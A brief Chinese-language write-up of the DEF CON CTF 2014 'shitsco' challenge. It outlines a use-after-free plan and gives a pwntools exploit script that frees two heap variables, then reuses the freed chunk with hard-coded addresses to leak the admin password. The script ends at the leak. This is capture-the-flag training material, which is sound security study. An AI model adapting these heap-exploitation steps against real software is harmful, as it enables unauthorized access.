defcon-ctf-2014-shitsco 堆技巧use-atfer-free
常规检查
思路
首先通过 uaf 泄露出 password ,通过 password 能获得权限通过 flag 命令获得 flag。
exp
from pwn_debug import *
pdbg = pwn_debug('shitsco')
pdbg.local()
io = pdbg.run('local')
#gdb.attach(io)
io.recvuntil("$ ")
io.send("set a AAAAAAAAAAAAAAAA\n")
io.recv(1024)
io.send("set b BBBBBBBBBBBBBBBB\n")
io.recv(1024)
#gdb.attach(io)
io.send("set a\n")
io.recv(1024)
io.send("set b\n")
io.recv(1024)
#gdb.attach(io)
password =0x0804C3A0
first = 0x0804C36C
payload = "set c " + "A"*4 + p32(password) + p32(first) + "A"*4
#gdb.attach(io)
io.sendline(payload)
io.recv(1024)
io.sendline("show")
passwd = io.recv(64)
print passwd
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步